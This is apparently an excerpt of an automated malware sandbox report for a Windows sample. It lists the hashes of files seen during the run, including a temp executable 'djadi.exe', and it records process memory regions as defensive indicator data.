00d5d569084f38687879aad3fce3aeda
SHA1b9d1ea2bc93f1e2fe1bd45fdaa42b597be16a83a
SHA256f8a26d50f944b0d981f9d2e984a90f62b180342aeb9c2f13e7558e1831dc915f
SHA51223f94f5ee5ff01a24acdda4c1cd3f37844c84d2334cc64d0e522582a8c2d7122e90a066703ab0787b3424b39134e374e129eb6e4d17ea37f9f0664c501004c66
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
c58c4a7b0c83d268266f5b621cb0ed68
SHA18bd3d4155ebbd395e27fd4e7956b19059d1d8b6c
SHA2562e046c2fec67ef37c2d233e26bf95fc969a9ec186da6591fe82932cc326fa247
SHA5124736f4b62c19d82cd08a611b1b89b3a34f0bf6cf4a6591d29ad82191c24585f5e26c30a4f2fd5c2882257464a3c1e28fb8f315126181c61d7924e7286ff284f1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
0ab60d2bc3a86ad9adb98e7e11537cf8
SHA1163247fcbec0825f1ecd7b7de2e8c51cba5509d4
SHA256377c34b0c12d2b53fc2ffec0f84a318ba46ab30d3969cd5f5cc53b3264c174ae
SHA512ab33f75afc0608bcbb046ac4b54d63938720994417a1954339832dd8a8f06342c3f0d84347251df5b6816e86518e4f1d6647c2493f87fa0c5ee1907bb28aedf5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b0b2f5a-4fa9-4284-9780-9a1da7b14a47MD5
02ff38ac870de39782aeee04d7b48231
SHA10390d39fa216c9b0ecdb38238304e518fb2b5095
SHA256fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
SHA51224a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_85c7c16f-de6b-4cda-bf8a-ede9c5910d3dMD5
df44874327d79bd75e4264cb8dc01811
SHA11396b06debed65ea93c24998d244edebd3c0209d
SHA25655de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181
SHA51295dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a02197da-f9c8-43e6-9ff1-846e01d2d404MD5
75a8da7754349b38d64c87c938545b1b
SHA15c28c257d51f1c1587e29164cc03ea880c21b417
SHA256bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96
SHA512798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b771b377-145f-49e9-bf64-45e69646f7b9MD5
5e3c7184a75d42dda1a83606a45001d8
SHA194ca15637721d88f30eb4b6220b805c5be0360ed
SHA2568278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59
SHA512fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c356f451-13b2-41fc-8d4c-54a293efa6e1MD5
b6d38f250ccc9003dd70efd3b778117f
SHA1d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a
SHA2564de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265
SHA51267d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce569c42-07bf-442e-b377-8e9695c9383cMD5
be4d72095faf84233ac17b94744f7084
SHA1cc78ce5b9c57573bd214a8f423ee622b00ebb1ec
SHA256b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc
SHA51243856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
b9f41ed816b6599859c3ee7dfe0415bb
SHA1bd5c6875021d8a547a70c152f480c6431057e710
SHA256e8b8650b21f2349d6c7582ee1ac8d73c69d88560f29a9cbbb19a3433a54f3710
SHA512ef7ba73fc4729644dcd95ccce527d94ee441513c3b8c0d52b599ecf0b2b19c1407e90d09e6b8c510cdcc7482cad2dd6d06a179ffbec687a17c3f3c75706a338b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7ISB2KAC\UHLTY9WW.htmMD5
54972de2ff36c3663ba412d3b7e4bd76
SHA1c31c41c3abcac04f8fa0516de113dd5ead0286f0
SHA256499072e66cc41595f7f55a6f22e4fbfceb88fbc6e85170235830c0282571e2c2
SHA5122c17e515ace12898603f780d47ca7b5cf45cb00f9d1dfa5559b2ca556a972baab633c293f355887c675d8123928696b98eccba1e7c1dc577720d4bbfc14dc96b
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
88acae3e364010e82fb022c29ab69c9d
SHA1043f08caaf36d317c60977dd9bdaa2be62ed54a0
SHA256f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b
SHA51238283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
88acae3e364010e82fb022c29ab69c9d
SHA1043f08caaf36d317c60977dd9bdaa2be62ed54a0
SHA256f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b
SHA51238283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c
-
C:\Users\Admin\AppData\Local\Temp\djadi.exeMD5
a1500c1f43a4a81444440aa922391300
SHA15e3643cf4b29c16dbc9632cddb20689a971533ab
SHA2560098b586935058cbae3b6713d281f47c361fe87c5b9148add360cfb84cec73e0
SHA512b88c66c5a5b235be30dcb1d3b977d457478e13369674e9395797b64001edf084700b2fea2a760d17f1ead24c9f9914fa1d220e850e059dee39a91c40675b51cd
-
C:\Users\Admin\AppData\Local\Temp\djadi.exeMD5
a1500c1f43a4a81444440aa922391300
SHA15e3643cf4b29c16dbc9632cddb20689a971533ab
SHA2560098b586935058cbae3b6713d281f47c361fe87c5b9148add360cfb84cec73e0
SHA512b88c66c5a5b235be30dcb1d3b977d457478e13369674e9395797b64001edf084700b2fea2a760d17f1ead24c9f9914fa1d220e850e059dee39a91c40675b51cd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\8RYSA0O1.txtMD5
c05ba2ad2933696b40e4117c73847f4d
SHA14232a809e231bf85c2f54efaa514d3911c7c7729
SHA25640824b1a5ed8bada683b8f94529a4a7427a4a6cdc145034d894591fb8a6cd175
SHA512f5e1c072f5cb56a288c8581143f02a49ba8b17c405570f9e25067156376b3fdd0a76489bc598bc4f76ca39485dee58690c0a2552a661d1be10d0fd1bf35c227b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msMD5
927abe9d1beb55345697f165f1e16f38
SHA17327640308bc3f0e13a5d71036f89b9f7f0e6a27
SHA2567f8fdbb56eae609b29c9151df4f7eeec6597185d020cb7886ae40b90045e9f0c
SHA512690e52550232aadb2a33b72c84f46611dd0b53003a9c38c6a2b903087957cdf38f16e7ac26f12d26c3a8f023c3e6bfaade9d8dbe22fa228188b6ef7ace6bd9af
-
\Users\Admin\AppData\Local\Temp\djadi.exeMD5
a1500c1f43a4a81444440aa922391300
SHA15e3643cf4b29c16dbc9632cddb20689a971533ab
SHA2560098b586935058cbae3b6713d281f47c361fe87c5b9148add360cfb84cec73e0
SHA512b88c66c5a5b235be30dcb1d3b977d457478e13369674e9395797b64001edf084700b2fea2a760d17f1ead24c9f9914fa1d220e850e059dee39a91c40675b51cd
-
\Users\Admin\AppData\Local\Temp\djadi.exeMD5
a1500c1f43a4a81444440aa922391300
SHA15e3643cf4b29c16dbc9632cddb20689a971533ab
SHA2560098b586935058cbae3b6713d281f47c361fe87c5b9148add360cfb84cec73e0
SHA512b88c66c5a5b235be30dcb1d3b977d457478e13369674e9395797b64001edf084700b2fea2a760d17f1ead24c9f9914fa1d220e850e059dee39a91c40675b51cd
-
memory/748-6-0x0000000000900000-0x0000000000901000-memory.dmpFilesize
4KB
-
memory/748-29-0x00000000056C0000-0x00000000056C1000-memory.dmpFilesize
4KB
-
memory/748-7-0x00000000048E0000-0x00000000048E1000-memory.dmpFilesize
4KB
-
memory/748-5-0x0000000072F10000-0x00000000735FE000-memory.dmpFilesize
6.9MB
-
memory/748-37-0x00000000062C0000-0x00000000062C1000-memory.dmpFilesize
4KB
-
memory/748-24-0x0000000005610000-0x0000000005611000-memory.dmpFilesize
4KB
-
memory/748-30-0x0000000006100000-0x0000000006101000-memory.dmpFilesize
4KB
-
memory/748-2-0x0000000000000000-mapping.dmp
-
memory/780-59-0x0000000000000000-mapping.dmp
-
memory/780-62-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/844-1-0x0000000000000000-mapping.dmp
-
memory/1164-3-0x0000000000000000-mapping.dmp
-
memory/1248-0-0x000007FEF7800000-0x000007FEF7A7A000-memory.dmpFilesize
2.5MB
-
memory/1252-8-0x0000000000000000-mapping.dmp
-
memory/1252-20-0x0000000004EA0000-0x0000000004EA1000-memory.dmpFilesize
4KB
-
memory/1252-10-0x0000000072F10000-0x00000000735FE000-memory.dmpFilesize
6.9MB
-
memory/1252-14-0x00000000011C0000-0x00000000011C1000-memory.dmpFilesize
4KB
-
memory/1264-12-0x0000000000000000-mapping.dmp
-
memory/1352-52-0x0000000000000000-mapping.dmp
-
memory/1352-61-0x00000000025D0000-0x00000000025D4000-memory.dmpFilesize
16KB
-
memory/1352-51-0x0000000000000000-mapping.dmp
-
memory/1512-55-0x0000000002770000-0x0000000002774000-memory.dmpFilesize
16KB
-
memory/1512-49-0x0000000000000000-mapping.dmp
-
memory/1512-47-0x0000000000000000-mapping.dmp
-
memory/1604-45-0x0000000000000000-mapping.dmp
-
memory/1820-54-0x0000000000000000-mapping.dmp
-
memory/1836-48-0x0000000000000000-mapping.dmp